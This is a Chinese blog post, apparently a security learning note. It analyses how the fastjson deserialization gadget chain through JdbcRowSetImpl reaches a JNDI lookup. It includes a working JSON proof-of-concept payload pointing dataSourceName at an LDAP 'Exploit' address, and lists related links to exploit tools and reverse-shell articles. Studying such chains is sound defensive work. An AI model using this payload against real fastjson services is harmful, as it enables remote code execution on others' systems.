【JAVA反序列化学习5】fastjson反序列化JdbcRowSetImpl类JNDI注入分析

最新推荐文章于 2024-03-08 19:50:02 发布
最新推荐文章于 2024-03-08 19:50:02 发布
阅读量877 收藏 1
点赞数 4
分类专栏: JAVA安全 文章标签: java 学习 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GX233/article/details/125091091
版权

最近fastjson又出洞了,想起来还有链没填完,赶紧补完先。

fastjson反序列化JdbcRowSetImpl类JNDI注入分析

这次分析只要到达jndi.lookup就可以了。

直接上poc。

String t = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\", \"autoCommit\":true}";
JSON.parseObject(t);

直接在JdbcRowSetImpl中搜索lookup

在这里插入图片描述

发现只有在connect方法处调用了lookup,参数是DataSourceName。需要找到在fastjson反序列化过程中,setter或者getter有调用到connect的地方。直接搜。

找到了两个可能的地方。一个是getDatabaseMetaData中。

public DatabaseMetaData getDatabaseMetaData() throws SQLException {
    Connection var1 = this.connect();
    return var1.getMetaData();
}

另一个是setAutoCommit

public void setAutoCommit(boolean var1) throws SQLException {
    if (this.conn != null) {
        this.conn.setAutoCommit(var1);
    } else {
        this.conn = this.connect();
        this.conn.setAutoCommit(var1);
    }

}

动态跟踪一下,看看先,最先进到的是setAutoCommit。

在这里插入图片描述
在这里插入图片描述

DataSourceName也在反序列化中由setter写入我们指定的ldap服务器的地址了。然后啊,然后就没有了,然后就是jndi注入了。

至于getDatabaseMetaData,则不会调用到,因为在反序列化过程中调用的getter必须继承自Collection Map AtomicBoolean AtomicInteger AtomicLong的getter方法,这在之前BCEL那条链中讲到过。

总结一下调用链。

parse->setValue->setAutoCommit->connect->lookup

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BCRIWvAn-1654091761401)(images/Be4vulWVW4Pgj_QHchkURwz6cv_mqYQcCEJHPi8SF94.png)]

Cgxx
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> []] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的...
fastjson反序列化漏洞复现
weixin_43225966的博客
04-23 764
fastjson 反序列化漏洞复现
fastjson1.2.24反序列化漏洞复现,验证JdbcRowSetImpl
liu649983697的专栏
05-30 1442
fastjson反序列化漏洞复现、实验、验证,远程命令调用、漏洞攻击
Web】浅聊Java反序列化C3P0——JNDI注入利用
最新发布
uuzeray的博客
03-08 469
出网的情况下,这个C3P0的Gadget可以和fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等配合使用(调用setter和初始化方法)和hex base的打法相比,这条链的利用更是强依赖FJ反序列化hex base好歹是有个setter设置属性+构造方法触发sink来进行攻击,jndi的利用干脆用setter把二者全包了。
fastjson反序列化漏洞_fastjson结合JdbcRowSetImpl反序列化利用理解
weixin_39783156的博客
11-28 436
前言最近看到网上有新出的fastjson反序列化利用,就好奇的琢磨了一下,查了一些资料然后整理出来,有不正确的地方还望指正。反序列化的利用本质:找到一条有效的攻击链,攻击链的末端就是有代码执行能力的,来达到我们想做的事情,一般都是用来RCE(远程命令执行)。构造一个触发器,也就是通过什么方式来让攻击链执行你想要的代码。触发器可以通过很多方式,比如静态代码块、构造方法等等。fastjson是阿里巴...
Java反序列化 C3P0 GadGets2利用链记录(JNDI)
LTianHang的博客
02-07 132
Java反序列化 C3P0 GadGets2利用链记录(JNDI)
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 反序列化时间格式化方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化和反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习
Java反序列化实战.pdf
08-08
本议题将从那些经典案例入手,分析攻击方和防御方的对抗过程。会从fastjsonweblogic的两个经典漏洞,带大家傲游反序列化的世界。 反序列化入门 Fastjson Weblogic 反序列化防御
FastJson反序列化
06-17
[{"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],"test":"432"}, {"listA":[{"id":"fds","name":"张三"},{"id":"fds","name":"李四"}],...数组里面封装数组的反序列化方法,通过两个bean,进行封装
JDBC无法连接本地MySQL的原因可解决办法
qq_35357007的博客
08-31 721
​ 之前一直都用的MySQL 5,最近换了MySQL 8,出了一大堆莫名其妙的问题,连用JDBC连接个数据库都出了一大堆问题,就顺便总结下,免得自己又忘了。
14-java安全——fastjson1.2.24反序列化JdbcRowSetImpl利用链分析
网络安全
09-01 732
fastjson在1.2.24版本中,除了TemplatesImpl链之外,还有一个JdbcRowSetImpl利用链,JdbcRowSetImpl链有两种利用方式:一种是RMI和JNDI利用方式,另一种是JNDI和LDAP利用方式,关于JNDI的相关概念之前在java安全基础中已经介绍过了,而且底层原理已经分析过了,大家可自行参考以下文章。 4-java安全基础——RMI远程调用 5-java安全基础——RMI和JNDI实现漏洞利用 6-java安全基础——JNDI和LDAP利用 1. RMI
java安全学习笔记--fastjson1.2.24反序列化漏洞两种利用链分析(TemplatesImpl,JdbcRowSetImpl
m0_64685672的博客
02-03 2754
测试环境 jdk1.7 fastjson 1.2.24 Fastjson简介及用法 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,常用在前后端分离的项目中,用来处理前端传来的json数据,JSON字符串和Java对象的转换就是基于序列化和反序列化来实现的。 演示代码: package com.test; import com.alibaba.fastjson.JSON;
fastjson反序列化JdbcRowSetImpl
qq_40710190的博客
07-08 258
fastjson利用链
fastjason 0day 漏洞修复
撸起袖子加油干
04-18 1105
一、0day漏洞: 通常是指软件版本,一个新的版本出来之后,随之而来的破解版本在24小时内即会出现。前段时间,阿里云云盾应急响应中心监测到FastJSON存在0day漏洞,攻击者可以利用该漏洞绕过黑名单策略进行远程代码执行。 二、DEMO: public class DemoTest { public static void main(String[] args) { String payload = "{\"name\":{\"@type\":\"jav...
追洞小组 | fastjson1.2.24复现+分析
Ms08067安全实验室
03-05 2733
网络安全知识小百科,就点上方蓝字关注我们文章来源|MS08067 WEB攻防知识星球本文作者:爱吃芝士的小葵(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组1、靶场搭建2、...
FastJson远程代码执行漏洞基于JNDI反弹shell使用
hapenl的博客
10-13 4254
FastJson组件1.2.24及之前版本存在远程代码执行漏洞(CVE-2017-18349)。本文讲解的是基于JNDI的反弹shell操作。
jdbc链接数据库失败的问题
qq_44930356的博客
12-10 2407
jdbc链接数据库的问题
java fastjson 泛型反序列化
08-19
Java中使用fastjson进行泛型反序列化,你可以按照以下步骤进行操作: 首先,确保你已经引入fastjson的依赖,可以通过Maven等构建工具添加以下依赖项: ```xml <groupId>com.alibaba</groupId> ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cgxx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值